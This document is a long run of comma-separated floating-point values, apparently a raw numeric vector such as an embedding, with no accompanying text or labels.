0.012945159338414669, -0.021565686911344528, 0.0026148934848606586, 0.00010388410009909421, -0.013124753721058369, -0.01081157848238945, -0.020473754033446312, 0.01652267947793007, 0.0203444454818964, 0.008836041204631329, 0.027039723470807076, -0.0059661236591637135, -0.014769838191568851, -0.002255704952403903, -0.010682270862162113, -0.01413766574114561, -0.003965443000197411, -0.016292797401547432, -0.019238146021962166, -0.004346183035522699, -0.003433843608945608, 0.012140576727688313, 0.029941966757178307, -0.0012616502353921533, -0.007029322441667318, -0.036895859986543655, 0.01991342008113861, -0.017973801121115685, 0.016134755685925484, 0.02742764726281166, -0.027054090052843094, -0.007614799775183201, -0.008642079308629036, -0.008175133727490902, 0.000982381054200232, 0.020229505375027657, 0.014575876295566559, 0.02729833871126175, 0.006476171780377626, -0.024410462006926537, -0.009906423278152943, -0.01956859789788723, -0.002054559299722314, -0.013067283667623997, -0.00565003789961338, -0.008677998557686806, -0.012492582201957703, 0.034568317234516144, -0.0216231569647789, 0.007115527521818876, -0.006986219435930252, 0.02225532941520214, 0.005298032891005278, -0.009633440524339676, 0.0002307787217432633, -0.0025340761058032513, -0.031723544001579285, 0.015976712107658386, -0.0005428238655440509, -0.00028982036747038364, 0.010675087571144104, -0.0042851208709180355, -0.005409381352365017, 0.0014053257182240486, -0.005667997058480978, 0.006917973980307579, -0.0188645888119936, -0.004705371335148811, 0.0216231569647789, 0.00025053409626707435, 0.02353404089808464, 0.011580242775380611, -0.014259790070354939, -0.009489764459431171, -0.0031339211855083704, 0.015200864523649216, -0.0031770237255841494, -0.009446661919355392, 0.0177870225161314, -0.0009725033305585384, 0.016335900872945786, 0.010610433295369148, 0.03063160926103592, 0.008821673691272736, 0.002869917545467615, 0.009051554836332798, -0.013958071358501911, -0.013282797299325466, 0.008771386928856373, -0.013448024168610573, 0.0090731056407094, -0.011335994116961956, 0.015919242054224014, 0.0017429629806429148, 0.0003208003763575107, -0.012212414294481277, 0.006354047451168299, -0.00027073847013525665, 0.013124753721058369, 0.033706266433000565, -0.003020776668563485, -0.002787304110825062, 0.0032416777685284615, 0.0019539864733815193, 0.0072304680943489075, -0.014432201161980629, -0.011422200128436089, -0.0027639567852020264, 0.0038073998875916004, -0.011608977802097797, -0.006178045179694891, 0.0172266885638237, 0.019367452710866928, -0.013958071358501911, 0.021105926483869553, 0.024784017354249954, -0.0014232851099222898, 0.02104845643043518, -0.01094807032495737, -0.0031626562122255564, -0.011752652935683727, -0.006264250259846449, 0.01623532734811306, 0.015560053288936615, -0.030717814341187477, 0.00664858240634203, 0.022671988233923912, -0.011314443312585354, 0.01211902592331171, 0.0026328528765589, 0.0018947202479466796, 0.0185054000467062, -0.033706266433000565, 0.0017905555432662368, -0.003617029869928956, 0.006799441296607256, -0.02367771789431572, -0.02715466357767582, 0.0011844246182590723, 0.009417926892638206, 0.003645764896646142, -0.002740609459578991, -0.00043731220648624003, -0.005369870457798243, 0.015402009710669518, 0.005890693981200457, -0.0077800266444683075, -0.016623251140117645, 0.004479082766920328, 0.0056751808151602745, -0.006099023390561342, -0.017557142302393913, 0.01659451611340046, 0.0009069513762369752, 0.007815945893526077, -0.007076016627252102, -0.00013043038779869676, -0.014195135794579983, 0.0008625017944723368, -0.04545891657471657, -0.005804488901048899, 0.01899389736354351, -0.0024047682527452707, -0.0014834492467343807, 0.0118101229891181, -0.023088647052645683, -0.007672269828617573, 0.01971227489411831, -0.010150671936571598, -0.006393558345735073, -0.004209691192954779, 0.0005603343015536666, -0.005157949402928352, -0.012233966030180454, 0.015186497010290623, 0.004489858169108629, -0.004611982498317957, -0.0004943333915434778, 0.007521410938352346, 0.025574233382940292, 0.020732369273900986, -0.015330172143876553, -0.011544323526322842, 0.001504102605395019, 0.0007071527070365846, -0.009683726355433464, -0.006519274320453405, -0.0207036342471838, 0.011034276336431503, -0.003124941373243928, 0.0032129427418112755, 0.00007301632285816595, 0.0035362124908715487, 0.000057526311138644814, 0.008354728110134602, -0.002160519827157259, 0.0043138558976352215, 0.014927880838513374, -0.004730514716356993, -0.02274382673203945, 0.007277162279933691, 0.003814583644270897, -0.02311738207936287, -0.003843318670988083, -0.008922246284782887, -0.002911224262788892, -0.008598976768553257, -0.023505305871367455, 0.003494905773550272, -0.007535778451710939, -0.021881774067878723, 0.015445113182067871, -0.016709456220269203, -0.0020761105697602034, -0.011199502274394035, -0.027628792449831963, -0.004870598204433918, 0.016278430819511414, 0.008132031187415123, -0.011551507748663425, 0.0031626562122255564, 0.002205418422818184, -0.01751403883099556, -0.0026436285115778446, 0.013304348103702068, -0.001426876988261938, 0.02580411359667778, -0.004385693464428186, 0.017341628670692444, -0.004568879958242178, 0.001056014676578343, -0.0039941780269145966, -0.005912245716899633, -0.012664992362260818, -0.001488837064243853, 0.005836816038936377, -0.0077369241043925285, -0.01390060130506754, 0.008670814335346222, 0.010782843455672264, -0.0033781693782657385, -0.008053010329604149, -0.0015750422608107328, -0.00811048038303852, 0.023016810417175293, -0.0019252512138336897, 0.004511409904807806, 0.024482300505042076, 0.004611982498317957, -0.01099117286503315, -0.013807212002575397, -0.017600243911147118, -0.002345501910895109, 0.035631515085697174, -0.019223777577280998, 0.015531318262219429, -0.02196797914803028, 0.0053159925155341625, -0.01303854864090681, -0.004637125879526138, -0.02820349484682083, -0.01024406123906374, -0.020732369273900986, -0.004281528759747744, -0.006451028399169445, -0.02091914787888527, 0.01801690272986889, 0.015919242054224014, -0.004949619993567467, -0.009180862456560135, -0.02218349277973175, -0.012514133006334305, -0.00984895322471857, -0.013462391681969166, -0.001412509474903345, 0.005797305144369602, -0.00040723016718402505, 0.00485263904556632, 0.001117076724767685, 0.003527232678607106, 0.0015364295104518533, -0.0007978478097356856, -0.0019665579311549664, -0.0034841301385313272, -0.020028360188007355, 0.0025197085924446583, -0.020028360188007355, 0.0038361349143087864, 0.01527270209044218, 0.014547141268849373, -0.004252793733030558, 0.009058738127350807, -0.02751385234296322, -0.006803033407777548, 0.015603155829012394, -0.012830219231545925, -0.00031653500627726316, 0.01439628191292286, -0.01971227489411831, 0.004306672140955925, -0.025545498356223106, -0.0053986054845154285, -0.008218237198889256, 0.0016154510667547584, 0.016896234825253487, 0.0022754601668566465, -0.0011996901594102383, -0.006846135947853327, 0.010603249073028564, 0.01941055618226528, 0.018548503518104553, 0.00024088089412543923, 0.002952530747279525, -0.02474091574549675, -0.011831674724817276, 0.004525777418166399, -0.015071556903421879, 0.014827308245003223, 0.02672363631427288, -0.006892830599099398, -0.0008427464053966105, -0.0020635388791561127, -0.010797210969030857, -0.013785661198198795, -0.00783749669790268, -0.01964043639600277, 0.009662175551056862, 0.020718002691864967, -0.003205758985131979, 0.014726735651493073, 0.0004642513522412628, 0.0194249227643013, -0.014841675758361816, 0.015430745668709278, -0.010093201883137226, 0.01006446685642004, 0.013333083130419254, 0.012277068570256233, 0.0012616502353921533, 0.025919053703546524, 0.00005494464130606502, -0.035976335406303406, -0.01084031444042921, 0.0168674997985363, -0.001716023893095553, -0.013785661198198795, -0.00843374989926815, 0.0052657057531178, 0.016680721193552017, 0.010323082096874714, 0.010581698268651962, -0.002499953145161271, -0.000019025774236069992, 0.0072448356077075005, 0.00006212841253727674, -0.017959432676434517, -0.01693933829665184, -0.02403690665960312, 0.02140764519572258, 0.008067377842962742, -0.01325406227260828, -0.009094657376408577, -0.024482300505042076, -0.009583153761923313, 0.014841675758361816, -0.006831768434494734, -0.005441708490252495, 0.012399192899465561, -0.0018767607398331165, 0.009762748144567013, 0.01913757249712944, -0.010373368859291077, 0.012111841700971127, -0.005524321924895048, 0.006580336485058069, -0.003322495147585869, 0.0042276508174836636, 0.01772955246269703, 0.009015635587275028, 0.0030153889674693346, 0.013067283667623997, 0.02275819331407547, 0.0355740450322628, 0.0064294771291315556, -0.000012957450962858275, 0.0042707533575594425, -0.016120387241244316, -0.009633440524339676, -0.0008072765194810927, -0.0032452696468681097, 0.03804526478052139, 0.02737017720937729, 0.022298432886600494, 0.005441708490252495, -0.0015561849577352405, -0.02517194114625454, -0.012212414294481277, -0.011925064027309418, -0.004173772409558296, 0.004195323679596186, -0.017973801121115685, -0.0026705677155405283, 0.035918865352869034, 0.0031770237255841494, -0.00615290179848671, 0.015402009710669518, -0.010272796265780926, -0.01165926456451416, -0.007772842887789011, -0.01737036369740963, 0.030804019421339035, -0.0018911283696070313, -0.013814396224915981, -0.024784017354249954, 0.03166607394814491, 0.003915156703442335, -0.008132031187415123, -0.008275707252323627, -0.0031680441461503506, -0.03198215737938881, -0.011853226460516453, -0.026005258783698082, 0.007165813818573952, 0.01407301239669323, 0.02558859996497631, -0.008455301634967327, 0.017126115038990974, 0.003311719512566924, 0.004719739314168692, 0.0072699785232543945, -0.0012957730796188116, -0.0018570054089650512, -0.022011080756783485, 0.028174759820103645, -0.001593899680301547, 0.004644309636205435, 0.024137478321790695, -0.010775660164654255, -0.010186590254306793, -0.0006483355537056923, 0.03132125362753868, 0.004180956166237593, 0.02445356547832489, -0.005190276075154543, -0.00953286699950695, -0.02693914994597435, 0.00260591390542686, -0.005714691709727049, -0.025545498356223106, -0.014798573218286037, -0.012808667495846748, -0.02353404089808464, -0.016077285632491112, -0.020387548953294754, -0.02254268154501915, -0.020100198686122894, 0.012219598516821861, 0.008103296160697937, 0.005901469849050045, -0.00003566631130524911, -0.0005428238655440509, -0.009030003100633621, -0.0188645888119936, -0.027183398604393005, 0.004346183035522699, -0.0025969340931624174, -0.0219823457300663, -0.004479082766920328, 0.008038642816245556, -0.008491219952702522, 0.009863320738077164, -0.00751422718167305, -0.020243873819708824, 0.0005836815689690411, 0.03364879637956619, -0.0029363674111664295, -0.04379228129982948, -0.00829007476568222, 0.016637619584798813, -0.019108837470412254, 0.004899333231151104, -0.01084749773144722, -0.00857742503285408, -0.00811048038303852, -0.014755470678210258, 0.023778289556503296, -0.024123111739754677, -0.007363367825746536, 0.008886327967047691, 0.009166494943201542, -0.004471899010241032, 0.033332709223032, 0.023850128054618835, -0.0026615881361067295, 0.0029219998978078365, -0.003351230174303055, -0.028102921321988106, -0.008800121955573559, 0.04132106527686119, -0.020459387451410294, -0.005025049671530724, 0.02027260884642601, -0.009942342527210712, 0.01679566130042076, 0.0011862205574288964, 0.011185134761035442, 0.010675087571144104, -0.014324444346129894, -0.004188139922916889, 0.014015541411936283, -0.0037642973475158215, 0.000772704603150487, 0.004435980226844549, 0.0072843460366129875, 0.003663724521175027, 0.0065013146959245205, -0.0019432107219472528, 0.030315523967146873, 0.008907878771424294, 0.01801690272986889, 0.007151446305215359, 0.0017869636649265885, 0.0025502394419163465, -0.016766926273703575, -0.003238085890188813, -0.017470937222242355, 0.002103049773722887, 0.0035793150309473276, 0.0008598078857176006, 0.0009760952088981867, 0.022226594388484955, -0.005441708490252495, 0.01573246344923973, 0.01941055618226528, -0.03721194714307785, -0.01764334738254547, 0.016134755685925484, 0.004396469332277775, 0.010481125675141811, 0.0026562002021819353, -0.003308127634227276, 0.02232716791331768, 0.0014915309147909284, 0.001412509474903345, 0.03137872368097305, 0.0081535829231143, -0.006415109615772963, -0.006864095572382212, 0.011177951470017433, 0.018332989886403084, 0.009360456839203835, 0.007715372834354639, -0.04244173318147659, 0.042987700551748276, -0.008132031187415123, -0.029367266222834587, -0.01240637619048357, -0.013131937943398952, -0.005506362300366163, 0.00015108373190741986, 0.010050099343061447, 0.011098929680883884, -0.005940980743616819, -0.016335900872945786, -0.011235421523451805, -0.0020168444607406855, 0.018907692283391953, 0.007302305661141872, 0.006346863694489002, 0.00628939364105463, -0.01070382259786129, -0.013670721091330051, -0.021565686911344528, 0.004554512444883585, -0.005653629545122385, 0.019726641476154327, 0.012751197442412376, -0.00597330741584301, -0.00009198597399517894, 0.010739740915596485, -0.0015265517868101597, 0.020617429167032242, 0.010574514046311378, 0.004673044662922621, -0.0302580539137125, 0.031436193734407425, -0.012521317228674889, -0.007679453585296869, 0.015387642197310925, 0.017988167703151703, 0.004755658097565174, -0.02041628398001194, 0.033332709223032, 0.020373180508613586, -0.020258240401744843, -0.012557235546410084, -0.018031271174550056, 0.00028106512036174536, -0.007097567897289991, 0.008907878771424294, -0.006555193103849888, 0.01070382259786129, -0.022499578073620796, -0.014051460660994053, -0.013426472432911396, 0.005495586432516575, 0.031177576631307602, -0.006106207147240639, 0.0009231148869730532, -0.0023365223314613104, 0.010854681953787804, -0.00028869789093732834, 0.005531505681574345, 0.004985538776963949, 0.04025786742568016, 0.006052329204976559, 0.005150765646249056, -0.022571416571736336, 0.041436005383729935, -0.012851770967245102, 0.024511035531759262, -0.004500634036958218, -0.00248199375346303, 0.004224058706313372, -0.0179450660943985, 0.0072556110098958015, -0.01964043639600277, -0.0006671929731965065, -0.007036506198346615, 0.00701854657381773, 0.006788665894418955, -0.003661928465589881, 0.017241057008504868, -0.010869049467146397, -0.013706639409065247, 0.0028465702198445797, 0.018246784806251526, 0.012463847175240517, -0.017312893643975258, -0.02239900454878807, -0.01148685347288847, 0.0018049230566248298, -0.0051687248051166534, -0.013907785527408123, -0.023519674316048622, -0.030459199100732803, 0.0006631520809605718, -0.0031806156039237976, 0.008721101097762585, -0.004364142194390297, -0.010330266319215298, 0.012988261878490448, 0.009971077553927898, 0.019453657791018486, -0.01485604327172041, 0.00006398047844413668, 0.019195042550563812, -0.010459573939442635, 0.004780801013112068, -0.0045760637149214745, -0.016206592321395874, 0.02793051116168499, -0.005693140439689159, 0.006116983015090227, -0.022169124335050583, 0.008002723567187786, 0.01326124556362629, 0.006210372317582369, -0.012241150252521038, -0.010588881559669971, -0.004870598204433918, -0.004953211639076471, 0.010804395191371441, 0.023692084476351738, 0.0022575007751584053, 0.0012383029097691178, 0.004658677149564028, -0.006580336485058069, -0.02055995911359787, -0.03054540418088436, 0.0009572377894073725, -0.01353422924876213, -0.00861334428191185, -0.0011916083749383688, -0.010445206426084042, -0.019036998972296715, -0.024051273241639137, 0.0011269544484093785, 0.014108930714428425, 0.009130575694143772, -0.020574327558279037, -0.01665198616683483, 0.0016217367956414819, -0.0027352217584848404, -0.017183585092425346, -0.03011437878012657, -0.015761198475956917, -0.022916236892342567, -0.0009294006740674376, -0.0011296484153717756, 0.020301343873143196, 0.009511316195130348, -0.001439448562450707, 0.007528594695031643, 0.005563832353800535, 0.0026723637711256742, 0.025042634457349777, -0.0010299735004082322, -0.010833130218088627, 0.00664858240634203, -0.024985164403915405, -0.004992722533643246, -0.002963306615129113, -0.04040154069662094, 0.011996901594102383, 0.0006429477361962199, 0.0026849352288991213, -0.009597521275281906, 0.0022610926534980536, -0.009920790791511536, 0.013527045026421547, 0.02870635874569416, -0.006727603729814291, 0.016134755685925484, -0.014345995150506496, 0.01262188982218504, 0.004493450280278921, 0.008548690006136894, 0.0006002940353937447, 0.004188139922916889, -0.007072424981743097, 0.012269885279238224, -0.017140483483672142, 0.014274157583713531, 0.004773617256432772, -0.01808874122798443, -0.020516857504844666, -0.01499971840530634, -0.015085924416780472, -0.014238239265978336, 0.004752065986394882, -0.00007767455099383369, 0.010761292651295662, -0.017111748456954956, -0.011084562167525291, 0.02133580669760704, -0.010976805351674557, -0.010272796265780926, 0.013369002379477024, -0.017557142302393913, -0.016335900872945786, -0.0010003404458984733, 0.01176702044904232, -0.0022592968307435513, -0.029941966757178307, -0.01857723854482174, -0.01548821572214365, 0.006727603729814291, 0.01735599711537361, -0.0016801049932837486, -0.0014502241974696517, -0.012327355332672596, 0.0013056508032605052, -0.01101990882307291, -0.016278430819511414, -0.0016423901543021202, -0.022930605337023735, 0.028663255274295807, -0.019180674105882645, -0.004651493392884731, 0.00911620818078518, -0.004554512444883585, 0.009726828895509243, -0.0040803831070661545, -0.00846966914832592, 0.020373180508613586, 0.029367266222834587, -0.00017802287766244262, 0.009913607500493526, 0.006598295643925667, -0.012111841700971127, -0.009496948681771755, -0.001487041125074029, -0.008124847896397114, 0.011968166567385197, 0.002963306615129113, -0.027125928550958633, -0.000017215801562997513, 0.014618978835642338, -0.019166307523846626, 0.018907692283391953, 0.009087473154067993, 0.024338623508810997, -0.006752747111022472, -0.013641986064612865, 0.028404640033841133, 0.008800121955573559, 0.006806625053286552, -0.020315710455179214, -0.01708301343023777, -0.012040004134178162, -0.017169218510389328, -0.005236970726400614, -0.02487022429704666, 0.007945253513753414, 0.022240962833166122, 0.005840407684445381, 0.008340360596776009, -0.008548690006136894, -0.006831768434494734, 0.004619166254997253, -0.01737036369740963, -0.005976899527013302, -0.025631703436374664, 0.012241150252521038, 0.01144375093281269, 0.021149028092622757, -0.011242605745792389, -0.0025358719285577536, 0.0028232228942215443, 0.00549199478700757, -0.012823035940527916, -0.020172035321593285, 0.01780139096081257, -0.0103518171235919, 0.020114565268158913, 0.004741290584206581, -0.004001361783593893, -0.020100198686122894, 0.016766926273703575, -0.005775753874331713, 0.011831674724817276, -0.03439590707421303, -0.002072518691420555, -0.007851864211261272, 0.01318222377449274, -0.0051112547516822815, -0.02091914787888527, -0.025502394884824753, -0.0064187017269432545, -0.005948164500296116, -0.016924969851970673, 0.0018929243087768555, -0.0038540943060070276, -0.010416471399366856, -0.0009231148869730532, 0.01463334634900093, 0.03991304337978363, -0.006192412693053484, 0.00242631952278316, -0.012664992362260818, -0.01070382259786129, -0.015344539657235146, -0.008670814335346222, 0.021580055356025696, -0.005718283820897341, -0.003617029869928956, 0.012183679267764091, 0.007586064748466015, 0.0012032820377498865, -0.0006977239972911775, 0.02780120261013508, -0.00551354605704546, 0.014583059586584568, 0.0070257303304970264, 0.012499765492975712, 0.01659451611340046, 0.003760705469176173, 0.006454620510339737, -0.008728284388780594, -0.006106207147240639, -0.007093976251780987, 0.013555780053138733, 0.0010667903115972877, 0.011968166567385197, 0.007744107861071825, -0.004364142194390297, -0.0002552484511397779, -0.004400060977786779, -0.005808081012219191, 0.006465395912528038, -0.020789839327335358, 0.003247065469622612, -0.01658014953136444, -0.003692459547892213, 0.0016836968716233969, 0.023375999182462692, -0.022944971919059753, -0.003983402159065008, -0.003291964065283537, 0.011565875262022018, -0.008527139201760292, 0.0069395252503454685, 0.003710418939590454, 0.005535097327083349, -0.0014924289425835013, -0.02749948389828205, -0.006616255268454552, -0.012708094902336597, 0.0037678892258554697, -0.004360550548881292, -0.0039869942702353, 0.01580430194735527, -0.01841919496655464, 0.0008728284738026559, -0.013067283667623997, 0.007966804318130016, 0.011695182882249355, -0.0037822567392140627, 0.00006353149365168065, 0.027614424005150795, 0.0039007889572530985, 0.031091371551156044, 0.00010803721670527011, -0.007040097843855619, -0.0033206993248313665, -0.005028641317039728, -0.009784298948943615, -0.0216231569647789, -0.034769464284181595, -0.01679566130042076, 0.01596234366297722, 0.0001883495569927618, 0.009698093868792057, -0.0028771013021469116, -0.012413560412824154, -0.00521182781085372, -0.0064582121558487415, 0.00787341594696045, 0.008656446821987629, -0.014942248351871967, -0.02083294279873371, -0.016838764771819115, -0.00119609828107059, -0.010926519520580769, 0.006820993032306433, -0.005901469849050045, -0.01541637722402811, 0.010610433295369148, -0.000006822479917900637, 0.009188045747578144, -0.014223871752619743, 0.01587613858282566, 0.0009545438806526363, -0.008246972225606441, -0.0146692655980587, 0.0003192289441358298, -0.004813128150999546, 0.02962588146328926, 0.009633440524339676, -0.0032883721869438887, -0.00798117183148861, -0.006030777934938669, 0.010502676479518414, 0.015387642197310925, 0.010251244530081749, 0.012334538623690605, 0.010552963241934776, 0.011673632077872753, -0.01863470859825611, -0.009920790791511536, -0.0027549772057682276, -0.004762841854244471, 0.0039043808355927467, -0.0008993186056613922, 0.004321039654314518, 0.008261339738965034, 0.014152033254504204, -0.023059912025928497, -0.013598882593214512, -0.004529369063675404, -0.008182317949831486, 0.011156399734318256, 0.015574420802295208, -0.005887102335691452, -0.022212227806448936, 0.010301531292498112, -0.01785886101424694, 0.0039043808355927467, 0.015287069603800774, -0.0004249650810379535, -0.003954667132347822, 0.0012814055662602186, -0.030028171837329865, 0.005287257023155689, 0.028979342430830002, 0.01645084097981453, -0.007916518487036228, 0.015847403556108475, -0.012011269107460976, 0.010761292651295662, -0.023074280470609665, 0.015703728422522545, 0.014798573218286037, 0.006386374589055777, 0.009080289863049984, -0.008534322492778301, -0.010359001345932484, -0.0032219223212450743, 0.00793806929141283, -0.0067347874864935875, -0.010330266319215298, -0.014187952503561974, -0.007442389149218798, -0.011996901594102383, 0.0077943941578269005, -0.004137853626161814, 0.01764334738254547, 0.01915193907916546, -0.007384919095784426, -0.00026265671476721764, -0.0092527000233531, -0.004195323679596186, 0.004827495664358139, 0.022657621651887894, 0.00512203061953187, -0.021235235035419464, -0.004162996541708708, 0.017399098724126816, -0.003692459547892213, -0.021235235035419464, -0.004730514716356993, -0.0011682611657306552, -0.043131373822689056, 0.01609165221452713, 0.009597521275281906, -0.0034553951118141413, 0.005448892246931791, 0.002869917545467615, 0.010265612043440342, -0.022097287699580193, -0.01339773740619421, -0.002009660704061389, -0.015014085918664932, 0.0029022444505244493, 0.0022916237358003855, -0.012744014151394367, -0.023160485550761223, -0.005226195324212313, 0.016853133216500282, 0.011335994116961956, 0.02261451818048954, 0.011795755475759506, -0.010876232758164406, -0.028878768905997276, -0.0064582121558487415, -0.009999812580645084, 0.010962437838315964, -0.014942248351871967, 0.007815945893526077, -0.0009078493458218873, 0.001334385946393013, 0.010438023135066032, 0.009051554836332798, -0.01772955246269703, -0.004985538776963949, 0.02005709521472454, 0.014985350891947746, -0.008139215409755707, 0.006224739830940962, 0.02147948183119297, 0.021881774067878723, 0.019094469025731087, -0.009338905103504658, 0.034482114017009735, -0.0016334104584529996, -0.007126303389668465, 0.01211902592331171, -0.03146492689847946, -0.001699860324151814, 0.0005405789706856012, -0.0029830618295818567, -0.003415884217247367, 0.014209503307938576, -0.007909334264695644, -0.004238426219671965, 0.010739740915596485, -0.010452390648424625, 0.02261451818048954, 0.01134317833930254, 0.01701117493212223, 0.006853319704532623, -0.008512771688401699, 0.029252326115965843, 0.024137478321790695, 0.00843374989926815, 0.00251611671410501, 0.011285708285868168, -0.0009096452849917114, 0.003618825925514102, -0.0021138254087418318, 0.010409287177026272, 0.009475396946072578, 0.017700817435979843, 0.008986900560557842, -0.022930605337023735, 0.010179406963288784, 0.00039780145743861794, 0.013246878050267696, -0.0033458424732089043, 0.010509860701858997, 0.002745997393503785, -0.0092527000233531, -0.0036601326428353786, -0.0024101559538394213, -0.00428871251642704, -0.009310170076787472, 0.01117076724767685, 0.012226782739162445, 0.0018156986916437745, -0.002437095157802105, 0.004748474340885878, 0.01531580463051796, -0.01148685347288847, 0.011213869787752628, -0.0028447741642594337, -0.01495661586523056, 0.001363120973110199, -0.00829007476568222, 0.00046245541307143867, -0.005707507953047752, 0.0029345713555812836, -0.0011305463267490268, 0.013002629391849041, 0.0002801671507768333, -0.008713916875422001, 0.0101722227409482, -0.004540144931524992, -0.0008023377158679068, 0.0064187017269432545, 0.00012998140300624073, -0.016465209424495697, 0.008139215409755707, -0.0027352217584848404, -0.010466758161783218, -0.010574514046311378, 0.0034266598522663116, 0.015919242054224014, -0.008024275302886963, -0.0024317072238773108, 0.00334045453928411, -0.013016996905207634, 0.018404826521873474, 0.03146492689847946, -0.013972438871860504, 0.03180974721908569, 0.017528407275676727, -0.0077943941578269005, -0.010596065782010555, -0.009913607500493526, -0.0077512916177511215, -0.007815945893526077, -0.013979623094201088, 0.023232324048876762, -0.023160485550761223, -0.018462298437952995, -0.0099926283583045, -0.004946027882397175, 0.019324351102113724, -0.010402103886008263, -0.007413654122501612, -0.027039723470807076, 0.0012050779769197106, 0.007621983531862497, 0.015718096867203712, -0.018304254859685898, -0.002728038001805544, -0.013685088604688644, -0.020588694140315056, 0.029367266222834587, 0.006034369580447674, -0.002494565211236477, -0.0011332402937114239, 0.013024181127548218, 0.010631985031068325, -0.011371913366019726, 0.0017456569476053119, -0.02225532941520214, -0.005797305144369602, 0.005240562837570906, 0.007902150973677635, -0.00030643283389508724, -0.00521182781085372, 0.0020940699614584446, 0.001794147421605885, -0.014223871752619743, -0.018390459939837456, 0.0010236876551061869, -0.0017285954672843218, -0.020516857504844666, 0.014281341806054115, 0.01495661586523056, 0.002038395730778575, -0.0053878300823271275, 0.008527139201760292, -0.006576744373887777, 0.006932341493666172, 0.0009680134826339781, -0.013519861735403538, 0.004884965717792511, 0.012176495976746082, 0.02418058179318905, -0.00382895115762949, 0.016278430819511414, -0.004173772409558296, 0.003965443000197411, -0.010639168322086334, -0.009101840667426586, -0.013821580447256565, 0.00655878521502018, 0.0027064867317676544, 0.00005615128975478001, -0.005477627273648977, 0.0015741443494334817, 0.005624894518405199, 0.026536859571933746, -0.008419382385909557, 0.016077285632491112, -0.004687412176281214, 0.006224739830940962, 0.000436863221693784, -0.023921964690089226, -0.02374955452978611, 0.008663631044328213, 0.014827308245003223, 0.0016046754317358136, 0.023692084476351738, -0.003144696820527315, 0.007151446305215359, 0.019266881048679352, -0.012851770967245102, -0.01425260677933693, 0.017916331067681313, 0.010517043992877007, -0.009870504960417747, 0.003309923689812422, 0.010337449610233307, -0.0017456569476053119, 0.012198046781122684, 0.032355714589357376, 0.006616255268454552, -0.0011206686031073332, -0.00251611671410501, -0.009001268073916435, -0.00007312856905627996, 0.00686050346121192, 0.007313081528991461, -0.006684501189738512, 0.0016316145192831755, -0.007492675445973873, 0.013146305456757545, 0.008225420489907265, 0.003597274422645569, -0.0017483507981523871, 0.006562376860529184, 0.01194661483168602, 0.0058942860923707485, -0.0048490469343960285, -0.030660344287753105, 0.004202507436275482, 0.02962588146328926, -0.019870316609740257, -0.0006694378680549562, 0.0011458118679001927, 0.015531318262219429, -0.018117476254701614, 0.021565686911344528, -0.014080195687711239, -0.006522866431623697, -0.011529956012964249, -0.0011063010897487402, 0.003929524216800928, 0.01679566130042076, -0.0013496513711288571, 0.002377829048782587, 0.0168674997985363, -0.0016953705344349146, -0.014698000624775887, 0.010574514046311378, -0.0018605972873046994, 0.009669358842074871, -0.01737036369740963, -0.02423805184662342, -0.026982253417372704, -0.007252019364386797, 0.01636463589966297, 0.02012893371284008, 0.0005122928414493799, -0.006856911815702915, 0.00924551673233509, -0.02077547274529934, 0.0014205911429598927, -0.009137759916484356, 0.018376091495156288, 0.0008818081696517766, -0.02857705019414425, -0.006986219435930252, -0.006336088292300701, -0.0017528407042846084, 0.00686050346121192, -0.0031967791728675365, 0.004101934377104044, -0.015617523342370987, -0.0168674997985363, 0.039654430001974106, -0.00288069318048656, 0.010876232758164406, 0.018807118758559227, -0.0017672082176432014, 0.01247821468859911, -0.008915062993764877, 0.0011969961924478412, 0.0029668984934687614, -0.006081064231693745, 0.0067635225132107735, 0.018318621441721916, 0.01340492069721222, -0.010962437838315964, -0.00202762009575963, 0.006027185823768377, -0.00920959748327732, 0.005427340976893902, 0.01162334531545639, 0.0038109917659312487, 0.016062917187809944, -0.017772655934095383, -0.01616349071264267, -0.006020002067089081, 0.004044464323669672, -0.018189314752817154, -0.013807212002575397, 0.011192318983376026, 0.0011547915637493134, -0.015588788315653801, 0.009640623815357685, 0.020085830241441727, 0.0058511835522949696, 0.0012849974445998669, -0.00751422718167305, -0.004522185306996107, 0.005312400404363871, -0.004647901281714439, -0.020028360188007355, -0.009935158304870129, -0.00053608906455338, -0.010258428752422333, -0.0008113174117170274, -0.01226270105689764, -0.02104845643043518, -0.018347356468439102, 0.0024873814545571804, -0.028260964900255203, -0.014367546886205673, 0.01517212949693203, 0.0010847498197108507, 0.013562964275479317, -0.003336862660944462, 0.014741103164851665, -0.017844492569565773, -0.0050968872383236885, -0.002972286194562912, -0.009152127429842949, 0.004259977489709854, 0.013347450643777847, 0.02432425692677498, -0.014654898084700108, -0.01449685450643301, -0.014123298227787018, 0.012147760950028896, -0.024755282327532768, -0.011465302668511868, -0.009834585711359978, -0.016149122267961502, -0.0067491549998521805, -0.010315898805856705, -0.004683820065110922, -0.0034230679739266634, 0.017470937222242355, 0.010624800808727741, 0.01094807032495737, 0.017600243911147118, -0.005161541048437357, 0.0036996433045715094, 0.002284439979121089, 0.010215326212346554, 0.005060968454927206, -0.026263875886797905, 0.014683633111417294, -0.00019766601326409727, 0.0513208769261837, 0.004953211639076471, -0.016824398189783096, 0.004489858169108629, -0.010955254547297955, -0.0016971664736047387, 0.003291964065283537, -0.017686450853943825, -0.003613437991589308, -0.029108649119734764, -0.007302305661141872, 0.011551507748663425, -0.007014954928308725, -0.02899370901286602, 0.012521317228674889, -0.007133487146347761, 0.003291964065283537, 0.0033602099865674973, -0.013527045026421547, -0.010409287177026272, 0.007370551582425833, -0.0157468318939209, 0.0007215202203951776, 0.01485604327172041, -0.01258597057312727, 0.006745563354343176, -0.001117974752560258, -0.019324351102113724, 0.005305216647684574, -0.018476665019989014, 0.003710418939590454, 0.0048059443943202496, -0.012269885279238224, -0.012916424311697483, 0.007090384140610695, 0.0021587240044027567, 0.0027495892718434334, 0.01244229543954134, -0.00022572763555217534, -0.01385749876499176, 0.0157468318939209, 0.004231242462992668, -0.011235421523451805, 0.011867593973875046, -0.018203681334853172, 0.02906554751098156, -0.008634896017611027, 0.046608321368694305, 0.01449685450643301, 0.003663724521175027, 0.0008553180377930403, 0.0118101229891181, -0.0081535829231143, 0.0216231569647789, 0.025962157174944878, 0.002564607188105583, 0.01240637619048357, -0.02573227696120739, -0.03465452417731285, 0.00041755681741051376, 0.02339036576449871, 0.00988487247377634, -0.0023832167498767376, -0.004543736577033997, -0.0038684620521962643, 0.0008916858932934701, 0.006465395912528038, 0.025990892201662064, 0.0018588013481348753, 0.02991323173046112, -0.007000586949288845, -0.010459573939442635, -0.01244229543954134, -0.009144943207502365, -0.011917879804968834, -0.03410855680704117, -0.014640530571341515, -0.020243873819708824, 0.0017106360755860806, 0.0022305615711957216, 0.0011503016576170921, -0.009087473154067993, 